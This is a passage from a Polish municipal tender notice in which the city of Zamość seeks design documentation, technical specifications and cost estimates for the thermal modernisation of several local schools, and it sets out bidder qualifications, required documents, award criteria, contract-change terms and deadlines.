UWAGA: W przypadku składania oferty na więcej niż na jedno Zadanie warunek sytuacji ekonomicznej i finansowej ulega sumowaniu,                          tzn. Zamawiający uzna warunek sytuacji ekonomicznej i finansowej                          za spełniony jeżeli Wykonawca wykaże posiadanie środków finansowych lub zdolności kredytowej w wysokości nie mniejszej niż suma kwot wskazanych dla wszystkich Zadań, na które Wykonawca składa ofertę.
Wartości pieniężne wskazane w dokumentach złożonych przez Wykonawcę dotyczące warunków udziału w postępowaniu, podane w walutach innych niż PLN, Wykonawca przeliczy na złote polskie wg średniego kursu walut NBP 
z dnia publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu nie będzie opublikowany średni kurs walut przez NBP, Wykonawca powinien przyjąć kurs przeliczeniowy z ostatniej opublikowanej tabeli kursów NBP przed dniem publikacji ogłoszenia  o zamówieniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zadanie nr 1
Zamawiający uzna, że Wykonawca posiada niezbędną wiedzę                                   i doświadczenie, jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -                           w tym okresie - wykaże się wykonaniem w sposób zgodny                                     z obowiązującymi przepisami oraz zasadami wiedzy technicznej                          i ukończonej w terminie co najmniej jednej usługi, polegającej                             na wykonaniu wielobranżowego* projektu budowlanego 
i wykonawczego termomodernizacji budynków o kubaturze co najmniej 6000 m3. 
   
* Pod pojęciem wielobranżowego projektu budowlanego 
i wykonawczego Zamawiający rozumie wykonanie projektu budowlanego i wykonawczego w następujących branżach: konstrukcyjno-budowlanej, sanitarnej, elektrycznej i  teletechnicznej.

Wykonawca załączy dowody określające, czy usługi te zostały wykonane lub w przypadku świadczeń okresowych lub ciągłych - są wykonywane należycie.

Zadanie nr 2 
Zamawiający uzna, że Wykonawca posiada niezbędną wiedzę                                   i doświadczenie, jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -                           w tym okresie - wykaże się wykonaniem w sposób zgodny                                     z obowiązującymi przepisami oraz zasadami wiedzy technicznej                          i ukończonej w terminie co najmniej jednej usługi, polegającej                             na wykonaniu wielobranżowego* projektu budowlanego 
i wykonawczego termomodernizacji budynków o kubaturze co najmniej niż 15000 m3.    

* Pod pojęciem wielobranżowego projektu budowlanego 
i wykonawczego Zamawiający rozumie wykonanie projektu budowlanego i wykonawczego w następujących branżach: konstrukcyjno-budowlanej, sanitarnej, elektrycznej i  teletechnicznej.


Wykonawca załączy dowody określające, czy usługi te zostały wykonane lub w przypadku świadczeń okresowych lub ciągłych - są wykonywane należycie.

Zadanie nr 3
Zamawiający uzna, że Wykonawca posiada niezbędną wiedzę                                   i doświadczenie, jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -                           w tym okresie - wykaże się wykonaniem w sposób zgodny                                     z obowiązującymi przepisami oraz zasadami wiedzy technicznej                          i ukończonej w terminie co najmniej jednej usługi, polegającej                             na wykonaniu wielobranżowego* projektu budowlanego 
i wykonawczego termomodernizacji budynków o kubaturze co najmniej 22000 m3.  

* Pod pojęciem wielobranżowego projektu budowlanego 
i wykonawczego Zamawiający rozumie wykonanie projektu budowlanego i wykonawczego w następujących branżach: konstrukcyjno-budowlanej, sanitarnej, elektrycznej i  teletechnicznej.

Wartości pieniężne wskazane w dokumentach złożonych przez Wykonawcę dotyczące warunków udziału w postępowaniu, podane w walutach innych niż PLN, Wykonawca przeliczy na złote polskie wg średniego kursu walut NBP 
z dnia publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu nie będzie opublikowany średni kurs walut przez NBP, Wykonawca powinien przyjąć kurs przeliczeniowy z ostatniej opublikowanej tabeli kursów NBP przed dniem publikacji ogłoszenia  o zamówieniu;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych                        lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Okres gwarancji i rękojmi za wady fizyczne i prawne - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych przewiduje możliwość zmiany zawartej umowy ( dotyczy Zadania nr 1, 2 i 3) w następujących przypadkach:
1)  zmiana osób wyznaczonych do pełnienia funkcji, jak też powołania nowych, 
w przypadku: 
a)	śmierci, 
b)	rozwiązania stosunku pracy, 
c)	utraty uprawnień niezbędnych do wykonywania funkcji w ramach niniejszego zamówienia,
d)	choroby powyżej 14 dni potwierdzonej zaświadczeniem lekarskim, 
e)	innych zdarzeń losowych zaistniałych z przyczyn niezależnych od Zamawiającego oraz Wykonawcy, skutkujących obiektywną niemożliwością pełnienia funkcji przez daną osobę, wynikających z okoliczności, których mimo zachowania należytej staranności nie można było przewidzieć przed wszczęciem postępowania o udzielenie zamówienia publicznego. 
Zmiana osób wyznaczonych do pełnienia funkcji, jak też powołanie nowych, będzie możliwa na uzasadniony obiektywnymi okolicznościami wniosek Wykonawcy po zaakceptowaniu przez Zamawiającego kandydatury innej osoby spełniającej warunki zawarte w specyfikacji istotnych warunków zamówienia, co oznacza, że kwalifikacje nowo wprowadzonych osób muszą być takie same albo wyższe od kwalifikacji personelu wykazanego w ofercie. 
2)	zmiana podwykonawcy lub rezygnacja z udziału podwykonawcy przy realizacji przedmiotu zamówienia. 
Zmiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń wobec Wykonawcy z tytułu realizacji umowy. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art.26 ust. 2b ustawy Prawo zamówień publicznych, w celu wykazania spełnianie warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający dopuści zmianę pod warunkiem, że Wykonawca wykaże, że proponowany inny podwykonawca (lub wykonawca samodzielnie) spełniania warunki w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
3)	zmiana terminów realizacji umowy w następujących sytuacjach: 
a)	w przypadku przedłużania się procedury wyboru najkorzystniejszej oferty dopuszcza się przesunięcie terminu realizacji zamówienia, o którym mowa 
w § 5 umowy, 
b)	jeżeli zmiany będą następstwem działania organów sądowych lub administracyjnych, w szczególności dotyczących: 
-	przekroczenia określonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń itp., 
-	odmowy wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę lub Zamawiającego, 
c)	w przypadku konieczności uzyskania wyroku sądowego lub innego orzeczenia sądu lub organu administracyjnego, którego konieczności nie można było przewidzieć przed wszczęciem postępowania o udzielenie zamówienia publicznego, 
d)	w przypadku konieczności zaspokojenia roszczeń osób trzecich - w tym grup społecznych lub zawodowych nieartykułowanych lub niemożliwych do jednoznacznego określenia przed wszczęciem postępowania o udzielenie zamówienia publicznego, 
e)	w przypadku, gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa  w zakresie mającym wpływ na realizację przedmiotu umowy, 
f)	dopuszcza się zmianę terminu, o którym mowa w § 5 umowy, jeżeli zmiana terminu realizacji umowy jest konieczna z powodu działania siły wyższej, tj. niezwykłych i nieprzewidzianych okoliczności niezależnych od Strony, która się na nie powołuje i których konsekwencji mimo zachowania należytej staranności nie można było przewidzieć przed wszczęciem postępowania o udzielenie zamówienia publicznego. 	
Pod pojęciem siły wyższej na potrzeby niniejszego warunku, rozumieć należy zdarzenie zewnętrzne: 
-	o charakterze niezależnym od Stron, 
-	którego nie można uniknąć ani któremu Strony nie mogły zapobiec przy zachowaniu należytej staranności, 
-	którego nie można przypisać drugiej Stronie. 
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: 
-	powódź, pożar, 
-	silne wiatry, obfite opady atmosferyczne, ekstremalny upał lub mróz, nietypowe dla obszaru na którym realizowany jest przedmiot umowy, szczególnie w dłuższym okresie,
-	inne zdarzenia związane z działaniem sił natury, nietypowe dla tego obszaru.
Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych, których wystąpienie musi być normalnie brane pod uwagę przy składaniu ofert. 
Za siłę wyższą warunkującą zmianę umowy uważać się będzie również: 
-	zamieszki, strajki, ataki terrorystyczne, działania wojenne, 
-	nagłe i długotrwałe przerwy w dostawie energii elektrycznej, 
-	promieniowanie lub skażenia, 
-	nieprzewidziane uszkodzenie lub zniszczenie obiektu budowlanego, urządzenia technicznego lub systemu urządzeń technicznych powodujące przerwę w ich używaniu lub utratę ich właściwości, bez których zrealizowanie założonego pierwotnie celu umowy stało się niemożliwe, 
-	wystąpienie na obszarze, na którym realizowany jest przedmiot umowy zakażeń lub zachorowań na chorobę zakaźną lub innych zjawisk związanych ze zdrowiem w liczbie większej niż zwykle albo wystąpienie zakażeń lub chorób zakaźnych dotychczas niewystępujących,
4)	zmiana kwoty wynagrodzenia Wykonawcy w przypadku zmiany stawki podatku VAT. Jeżeli w trakcie realizacji przedmiotu umowy nastąpi zmiana stawki podatku VAT dla usług objętych przedmiotem zamówienia, Strony dokonają odpowiedniej zmiany wynagrodzenia umownego - dotyczy to części wynagrodzenia za prace, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano. 
5)	inne zmiany niż wymienione w pkt 1-4 w następujących sytuacjach: 
a)	zmiany prowadzące do likwidacji oczywistych omyłek pisarskich 
i rachunkowych w treści umowy, 
b)	zmiany dotyczące nazwy, siedziby Wykonawcy lub jego formy organizacyjno-prawnej w trakcie trwania umowy, numerów kont bankowych oraz innych danych identyfikacyjnych, 
c)	zmiany wskutek wystąpienia innych okoliczności nie wynikających z winy Wykonawcy ani Zamawiającego, których mimo zachowania należytej staranności nie można było przewidzieć przed wszczęciem postępowania o udzielenie zamówienia publicznego, a zrealizowanie założonego pierwotnie celu umowy byłoby bez tych zmian niemożliwe lub zmiany te są korzystne dla Zamawiającego, 
d)	dopuszczalne są wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienie ani na wynik postępowania o udzielenie zamówienia publicznego. 
2.	Powyższe zmiany zostaną wprowadzone aneksami i dokonane po przeprowadzeniu uzgodnień przez Strony umowy, w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zamosc.um.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ (materiały przetargowe) można także uzyskać nieodpłatnie w siedzibie Zamawiającego: Urząd Miasta Zamość ul. Pereca 12, 22-400 Zamość.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2016 godzina 10:00, miejsce: Oferty należy składać w pokoju nr 7 (Sekretariat Prezydenta Miasta)  w Urzędzie Miasta Zamość, 22-400 Zamość, Rynek Wielki 13 (Ratusz).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Otwarcie ofert nastąpi w dniu 27.01.2016r. o godz. 10:30 w siedzibie Zamawiającego - w Urzędzie Miasta Zamość, Rynek Wielki 13, 22-400 Zamość  w pokoju nr 12 (Ratusz). 2.
2.	Osoby uprawnione do kontaktów z Wykonawcami: Marta Trych, Małgorzata Strzępek  fax (84) 639-30-54, e-mail: zamowienia@zamosc.pl 3. W przypadku Wykonawców ubiegających się wspólnie o udzielenie  zamówienia: 3.1. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich 
w postępowaniu o udzielenie zamówienia albo reprezentowania 
w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.                              Z pełnomocnikiem tym będzie prowadzona wszelka korespondencja  wiążąca dla wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego.
3.2	Dokumenty wymagane w pkt III 4.2 ogłoszenia i III 4.4 ogłoszenia powinien złożyć każdy Wykonawca.
3.3	Pozostałe dokumenty oraz oświadczenie z art. 22 ust. 1 ustawy Prawo zamówień publicznych mogą być złożone wspólnie przez Wykonawców lub oddzielnie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - Opracowanie dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych, kosztorysu inwestorskiego na termomodernizację następujących obiektów oświatowych: a)	Zespół Szkół Nr 2 w Zamościu  ul. Sienkiewicza 5, 
b)	Zespół Szkół Ponadgimnazjalnych Nr 4 ul. Piłsudskiego 65,
c)	Szkoła Podstawowa Nr 6 im. Szymona Szymonowica w Zamościu ul. Orla 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 - Opracowanie dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych, kosztorysu inwestorskiego na termomodernizację następujących obiektów oświatowych: a)	Zespół Szkół Nr 2 w Zamościu  ul. Sienkiewicza 5, 
b)	Zespół Szkół Ponadgimnazjalnych Nr 4 ul. Piłsudskiego 65,
c)	Szkoła Podstawowa Nr 6 im. Szymona Szymonowica w Zamościu ul. Orla 5
1 Dokumentację projektową należy opracować w oparciu o zakres prac wynikających z audytów energetycznych (zgodnie z wymogami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane), będących załącznikami nr 9 do SIWZ.

2.	Zakres szczegółowy zamówienia: 
Opracowanie wielobranżowych projektów budowlano-wykonawczych docieplenia obiektów, projektów modernizacji instalacji centralnego ogrzewania (jeśli są wymagane) z zaprojektowaniem źródła ciepła z wykorzystaniem energii z wody gruntowej poprzez odwierty, projekt instalacji fotowoltaicznej, w przypadku konieczności opracowanie raportu oddziaływania na środowisko, uzyskanie decyzji środowiskowej, uzyskanie pozwolenia na budowę składających się 
w szczególności z: 

a)	planów, rysunków, szkiców oraz innych dokumentów umożliwiających jednoznaczne określenie rodzaju i zakresu robót podstawowych oraz ich uwarunkowań i dokładnej lokalizacji ich wykonania wraz z usunięciem kolizji 
z istniejącym uzbrojeniem, drzewostanem itp. - tzn. gotowe do złożenia w celu uzyskania pozwolenia na budowę wielobranżowe projekty budowlane wraz z uzgodnieniami i opiniami, zawierające informacje dotyczące bezpieczeństwa i ochrony zdrowia, sporządzone zgodnie z ustawą z dnia 
7 lipca 1994 r. Prawo budowlane (Dz. U. z 2013r. poz. 1409 z późn. zm), Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. 2012r. poz.462) oraz zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. 2013 r. poz. 1129) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego; 

b)	przedmiaru robót, przez który należy rozumieć opracowanie zawierające zestawienie przewidywanych do wykonania robót, łącznie z robotami nie przewidzianymi w projekcie, ale koniecznymi do wykonania z punktu widzenia sztuki budowlanej w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczeniem i zestawieniem ilości jednostek miar robót podstawowych oraz wskazaniem podstaw do ustalania cen jednostkowych robót lub jednostkowych nakładów rzeczowych;

c)	opracowanie dokumentacji geologicznej z terenu, gdzie będą zaprojektowane odwierty dla potrzeb pomp ciepła;

d)	uzgodnień i opinii, jeżeli będą one wymagane odrębnymi przepisami;

e)	specyfikacji technicznej wykonania i odbioru robót budowlanych (opracowanie zawierające zbiór wymagań, które są niezbędne do określenia standardu i jakości wykonania robot, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót) sporządzonej zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. 2013. poz. 1129);

f)	opracowana dokumentacja winna spełniać wymogi do aplikowania 
o dofinansowanie z Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2014-2020 Oś Priorytetowa 4 - Energia przyjazna środowisku.

3.5.	Wykonawca zobowiązuje się do wykonania przedmiotu umowy oddzielnie dla każdego z obiektów oświatowych wchodzących w zakres danego Zadania.
3.6.	Szczegółowy opis wykonania przedmiotu zamówienia oraz zakres prac zawarty jest w umowach stanowiących integralną część tych umów, będących załącznikiem nr 8a do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Okres gwarancji i rękojmi za wady fizyczne i prawne - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - Opracowanie dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych, kosztorysu inwestorskiego na termomodernizację następujących obiektów oświatowych: 
a)	II Liceum Ogólnokształcące im. M. Konopnickiej w Zamościu ul. Partyzantów 68, 
b)	Zespół Szkół Nr 6 w Zamościu ul. Kalinowa 5a. 
c)	Zespół Szkół Nr 3 w Zamościu ul. E. Orzeszkowej 43, 
d)	Zespół Szkół Nr 1 z Oddziałami Integracyjnymi w Zamościu ul. Peowiaków 30a.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 - Opracowanie dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych, kosztorysu inwestorskiego na termomodernizację następujących obiektów oświatowych: 
a)	II Liceum Ogólnokształcące im. M. Konopnickiej w Zamościu ul. Partyzantów 68, 
b)	Zespół Szkół Nr 6 w Zamościu ul. Kalinowa 5a. 
c)	Zespół Szkół Nr 3 w Zamościu ul. E. Orzeszkowej 43, 
d)	Zespół Szkół Nr 1 z Oddziałami Integracyjnymi w Zamościu ul. Peowiaków 30a
1. Dokumentację projektową należy opracować w oparciu o zakres prac wynikających z audytów energetycznych (zgodnie z wymogami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane), będących załącznikami nr 10 do SIWZ.

2. Zakres szczegółowy zamówienia: 
